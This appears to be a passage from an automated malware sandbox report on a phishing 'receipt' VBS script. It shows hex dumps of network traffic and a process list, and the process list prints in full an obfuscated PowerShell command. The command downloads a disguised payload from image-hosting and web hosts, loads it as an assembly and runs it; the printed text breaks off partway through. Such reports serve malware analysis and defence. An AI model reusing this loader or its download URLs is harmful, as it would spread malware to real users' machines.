2024-05-04 07:48:43 UTC	1369	IN	Data Raw: 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
2024-05-04 07:48:43 UTC	1369	IN	Data Raw: a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 Data Ascii: mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@BH
2024-05-04 07:48:43 UTC	1369	IN	Data Raw: f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 Data Ascii: #K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	131.153.147.50	443	6276	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:48:56 UTC	79	OUT	GET /nm/xwomay.txt HTTP/1.1 Host: www.evolve27.com Connection: Keep-Alive
2024-05-04 07:48:56 UTC	208	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:48:56 GMT Server: Apache Last-Modified: Thu, 02 May 2024 15:35:07 GMT Accept-Ranges: bytes Content-Length: 47788 Connection: close Content-Type: text/plain
2024-05-04 07:48:56 UTC	7984	IN	Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-05-04 07:48:56 UTC	8000	IN	Data Raw: 66 41 41 41 6a 41 77 49 41 4d 43 41 67 6b 41 41 41 41 43 41 67 41 77 49 41 4d 43 41 6a 73 41 41 41 30 46 41 4f 42 77 54 41 41 43 41 36 41 77 53 41 4d 45 41 50 42 41 54 41 4d 46 41 51 42 51 51 41 4d 45 41 62 31 42 41 41 30 46 41 47 42 67 52 41 38 45 41 67 41 67 4f 41 73 45 41 44 42 77 54 41 77 45 41 54 42 41 55 41 45 45 41 44 42 77 57 66 41 41 41 73 42 51 59 41 51 48 41 70 42 41 63 41 45 47 41 44 39 41 41 41 30 46 41 69 42 51 59 41 51 46 41 62 74 41 41 41 49 47 41 68 42 41 56 48 41 41 41 64 42 67 54 41 6b 45 41 58 42 77 57 4c 41 41 41 75 42 51 61 41 63 46 41 4d 6c 41 41 41 30 46 41 72 42 77 59 41 45 47 41 43 42 77 57 4e 41 41 41 72 42 77 59 41 45 47 41 43 6c 41 41 41 6b 48 41 6c 42 77 53 41 51 48 41 6d 42 51 61 41 67 47 41 54 42 41 54 54 41 41 41 64 42 41 Data Ascii: fAAAjAwIAMCAgkAAAACAgAwIAMCAjsAAA0FAOBwTAACA6AwSAMEAPBATAMFAQBQQAMEAb1BAA0FAGBgRA8EAgAgOAsEADBwTAwEATBAUAEEADBwWfAAAsBQYAQHApBAcAEGAD9AAA0FAiBQYAQFAbtAAAIGAhBAVHAAAdBgTAkEAXBwWLAAAuBQaAcFAMlAAA0FArBwYAEGACBwWNAAArBwYAEGAClAAAkHAlBwSAQHAmBQaAgGATBATTAAAdBA
2024-05-04 07:48:56 UTC	8000	IN	Data Raw: 30 35 57 5a 32 56 45 41 7a 64 57 59 73 5a 45 64 6c 74 32 59 76 4e 46 41 30 4e 57 5a 75 35 32 62 44 42 67 63 6c 64 57 5a 30 35 57 53 76 52 46 41 6c 70 58 61 54 4a 58 5a 6d 5a 57 64 43 52 6d 62 6c 4e 31 58 30 56 32 63 41 55 6d 65 70 4e 6c 63 6c 5a 6d 5a 31 4a 55 5a 32 6c 57 5a 6a 56 6d 55 66 52 58 5a 7a 42 51 5a 30 6c 6e 51 41 55 47 63 35 52 46 62 76 4e 32 62 30 39 6d 63 51 42 51 5a 77 6c 48 56 30 56 32 61 6a 39 32 55 41 6b 48 62 70 31 57 59 47 4e 33 63 6c 4a 48 5a 6b 46 45 41 72 4e 57 59 69 78 47 62 68 4e 6b 63 6c 31 57 61 55 42 51 4e 66 39 46 4a 68 52 6d 59 74 46 47 54 66 42 41 4d 68 42 41 4e 66 39 46 4a 68 52 6d 59 74 46 47 54 66 42 51 5a 30 56 6e 59 70 4a 48 64 30 46 45 5a 68 56 6d 63 6f 52 56 51 55 4e 46 41 6c 35 32 54 30 6c 57 59 58 42 51 5a 73 52 6d Data Ascii: 05WZ2VEAzdWYsZEdlt2YvNFA0NWZu52bDBgcldWZ05WSvRFAlpXaTJXZmZWdCRmblN1X0V2cAUmepNlclZmZ1JUZ2lWZjVmUfRXZzBQZ0lnQAUGc5RFbvN2b09mcQBQZwlHV0V2aj92UAkHbp1WYGN3clJHZkFEArNWYixGbhNkcl1WaUBQNf9FJhRmYtFGTfBAMhBANf9FJhRmYtFGTfBQZ0VnYpJHd0FEZhVmcoRVQUNFAl52T0lWYXBQZsRm
2024-05-04 07:48:56 UTC	8000	IN	Data Raw: 75 41 68 6d 43 6b 54 42 6f 41 42 6a 43 45 54 42 69 41 42 69 43 45 43 41 54 45 67 4e 41 45 6d 41 4a 46 67 4e 43 45 43 41 41 44 42 65 42 45 56 42 54 38 51 2b 43 45 52 42 4d 45 67 4e 43 45 52 42 47 38 67 79 43 6b 41 42 34 2f 67 6b 43 45 41 42 6d 4c 51 54 42 45 50 42 67 2f 67 64 42 6b 50 42 51 7a 77 4d 42 45 43 41 78 4a 51 54 42 6b 48 41 39 2f 77 51 42 45 46 41 78 39 77 4d 42 6b 4f 42 4b 2f 51 4a 42 45 46 42 45 2f 51 44 42 45 43 41 78 35 67 2f 42 45 4f 41 41 37 51 38 42 45 46 41 54 45 67 4e 42 45 4f 42 38 35 41 34 42 6b 4e 42 78 47 67 4e 41 45 6b 41 47 45 67 4e 42 6b 4b 42 69 4f 67 31 41 45 6a 41 47 45 67 4e 41 45 4a 42 63 36 41 76 41 45 44 42 58 36 67 73 42 6b 45 42 53 36 77 6e 41 45 44 42 53 36 51 69 41 45 44 41 54 45 67 4e 41 6b 44 42 46 47 67 4e 41 45 7a Data Ascii: uAhmCkTBoABjCETBiABiCECATEgNAEmAJFgNCECAADBeBEVBT8Q+CERBMEgNCERBG8gyCkAB4/gkCEABmLQTBEPBg/gdBkPBQzwMBECAxJQTBkHA9/wQBEFAx9wMBkOBK/QJBEFBE/QDBECAx5g/BEOAA7Q8BEFATEgNBEOB85A4BkNBxGgNAEkAGEgNBkKBiOg1AEjAGEgNAEJBc6AvAEDBX6gsBkEBS6wnAEDBS6QiAEDATEgNAkDBFGgNAEz
2024-05-04 07:48:56 UTC	8000	IN	Data Raw: 41 59 43 4b 48 34 74 43 41 41 67 4a 6f 6f 41 63 41 77 51 39 79 70 41 41 41 51 43 4b 5a 34 39 47 65 72 67 42 41 41 51 58 6f 6f 41 41 41 4d 46 4b 48 49 61 41 41 41 77 6a 4d 71 41 41 42 67 77 62 4b 41 51 41 48 4d 6e 43 41 45 67 42 6f 6f 41 41 42 55 41 4b 61 63 67 6f 4b 41 41 41 50 68 53 47 48 49 71 43 41 41 67 57 6f 67 78 42 69 71 41 41 41 77 45 4b 58 63 67 6f 42 41 41 41 70 78 6f 43 41 45 41 42 6f 59 78 42 4c 45 41 41 41 4d 51 6a 62 45 42 41 41 51 44 41 41 41 77 63 41 4d 41 4d 62 6f 69 42 41 73 69 43 4b 41 41 41 34 2f 6d 41 4b 41 51 41 44 67 53 45 41 41 77 4d 41 41 41 41 51 41 67 41 77 4d 68 4b 47 41 77 4b 4b 6f 41 41 41 34 38 62 43 6f 41 41 42 4d 41 4b 52 41 41 41 79 41 41 41 41 41 42 41 43 41 7a 45 42 41 41 41 6e 77 41 41 72 73 43 41 41 41 41 41 41 41 41 Data Ascii: AYCKH4tCAAgJooAcAwQ9ypAAAQCKZ49GergBAAQXooAAAMFKHIaAAAwjMqAABgwbKAQAHMnCAEgBooAABUAKacgoKAAAPhSGHIqCAAgWogxBiqAAAwEKXcgoBAAApxoCAEABoYxBLEAAAMQjbEBAAQDAAAwcAMAMboiBAsiCKAAA4/mAKAQADgSEAAwMAAAAQAgAwMhKGAwKKoAAA48bCoAABMAKRAAAyAAAAABACAzEBAAAnwAArsCAAAAAAAA
2024-05-04 07:48:57 UTC	7804	IN	Data Raw: 4b 41 41 41 4d 69 69 42 41 41 77 57 6f 59 41 41 41 45 47 4b 4b 41 41 41 70 39 57 44 52 6f 41 41 41 77 49 4b 45 41 41 41 5a 34 6e 43 41 41 41 6a 6f 59 41 41 41 77 46 4b 4b 41 41 41 4d 69 43 42 41 41 51 47 2b 42 48 41 46 45 6b 63 4b 41 41 41 63 2b 6d 43 41 41 77 6d 6f 30 51 45 4f 45 68 43 41 41 67 6d 76 68 42 46 52 6f 41 41 41 6b 4a 4b 4b 41 41 41 56 2b 47 44 52 6f 41 41 41 51 35 62 4d 45 68 46 57 51 68 45 56 45 68 43 41 41 51 6d 6f 41 41 41 41 77 4a 49 41 41 51 41 41 41 69 46 57 55 68 45 4d 45 78 43 52 73 77 45 4b 41 41 41 54 69 69 44 52 34 77 45 4b 41 41 41 59 4f 48 41 41 41 41 6e 67 41 41 41 42 41 41 49 4e 4d 68 43 41 41 51 51 7a 70 41 41 41 63 35 62 41 77 4d 41 67 41 53 43 52 59 68 46 57 59 42 43 52 6f 41 41 41 59 4a 4b 4b 41 41 41 56 2b 47 44 52 6f 41 Data Ascii: KAAAMiiBAAwWoYAAAEGKKAAAp9WDRoAAAwIKEAAAZ4nCAAAjoYAAAwFKKAAAMiCBAAQG+BHAFEkcKAAAc+mCAAwmo0QEOEhCAAgmvhBFRoAAAkJKKAAAV+GDRoAAAQ5bMEhFWQhEVEhCAAQmoAAAAwJIAAQAAAiFWUhEMExCRswEKAAATiiDR4wEKAAAYOHAAAAngAAABAAINMhCAAQQzpAAAc5bAwMAgASCRYhFWYBCRoAAAYJKKAAAV+GDRoA

Target ID:	0
Start time:	09:47:54
Start date:	04/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S847453-receipt.vbs"
Imagebase:	0x7ff66a720000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	09:48:15
Start date:	04/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreeQBhDgTreG0DgTrebwB3DgTreHgDgTreLwBtDgTreG4DgTreLwBtDgTreG8DgTreYwDgTreuDgTreDcDgTreMgBlDgTreHYDgTrebDgTreBvDgTreHYDgTreZQDgTreuDgTreHcDgTredwB3DgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGUDgTrecwBjDgTreHUDgTreZDgTreBlDgTreG